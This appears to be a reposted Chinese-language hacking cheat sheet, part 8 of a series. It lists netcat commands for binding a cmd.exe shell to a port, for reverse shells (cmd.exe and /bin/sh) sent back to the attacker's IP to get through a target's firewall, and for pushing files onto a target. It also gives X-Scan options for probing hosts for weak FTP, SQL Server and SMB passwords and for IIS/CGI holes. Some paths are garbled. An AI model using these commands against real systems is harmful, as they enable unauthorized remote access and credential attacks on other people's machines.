iis xp net user命令集合详解(8)

nc -l -p 5354 -t -e c:winntsystem32cmd.exe 绑定remote主机的cmdshell在remote的TCP 5354端口

nc -t -e c:winntsystem32cmd.exe 192.168.0.2 5354 梆定remote主机的cmdshell并反向连接192.168.0.2的5354端口

高级用法：

nc -L -p 80 作为蜜罐用1：开启并不停地80端口，直到CTR+C为止

nc -L -p 80 > c:\log.txt 作为蜜罐用2：开启并不停地80端口，直到CTR+C,同时把结果输出到c:\log.txt

nc -L -p 80 < c:\honeyport.txt 作为蜜罐用3-1：开启并不停地80端口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中，亦可起到传送文件作用type.exe c:\honeyport | nc -L -p 80 作为蜜罐用3-2：开启并不停地80端 口，直到CTR+C,并把c:\honeyport.txt中内容送入管道中,亦可起到传送文件作用

本机上用：nc -l -p 本机端口

在对方主机上用：nc -e cmd.exe 本机IP -p 本机端口 *win2Knc -e /bin/sh 本机IP -p 本机端口 *linux,unix 反向连接突破对方主机的防火墙 ，本机上用：nc -d -l -p 本机端口 < 要传送的文件路径及名称在对方主机上用：nc -vv 本机IP 本机端口 > 存放文件的路径及名称 传送文件到对方主机

备 注：

| 管道命令

< 或 > 重定向命令。“<”，例如：tlntadmn < test.txt 指把test.txt的内容

赋值给tlntadmn命令＠ 表示执行＠后面的命令，但不会显示出来（后台执行）；例：＠dir c:\winnt

>> d:\log.txt 意思是：后台执行dir，并把结果存在d:\log.txt中

>与>>的区别 ">"指：覆盖；">>"指：保存到(添加到）。

如：@dir c:\winnt >> d:\log.txt和@dir c:\winnt > d:\log.txt二个命令分别

执行二次比较看：用>>的则是把二次的结果都保存了，而用：>则只有一次的结果，是因为第二次的结果把第一次的覆盖了。

2、扫锚工具：xscan.exe

基本格式

xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] 扫锚"起始IP到终止

IP"段的所有主机信息

xscan -file <主机列表文件名> <检测项目> [其他选项] 扫锚"主机IP列表文件名"中的所有主机信息

检测项目

-active 检测主机是否存活

-os 检测远程操作系统类型（通过NETBIOS和SNMP协议）

-port 检测常用服务的端口状态

-ftp 检测FTP弱口令

-pub 检测FTP服务匿名用户写权限

-pop3 检测POP3-Server弱口令

-smtp 检测SMTP-Server漏洞

-sql 检测SQL-Server弱口令

-smb 检测NT-Server弱口令

-iis 检测IIS编码/解码漏洞

-cgi 检测CGI漏洞

-nasl 加载Nessus攻击脚本

本文来自电脑杂谈，转载请注明本文网址：
http://www.pc-fly.com/a/jisuanjixue/article-85718-8.html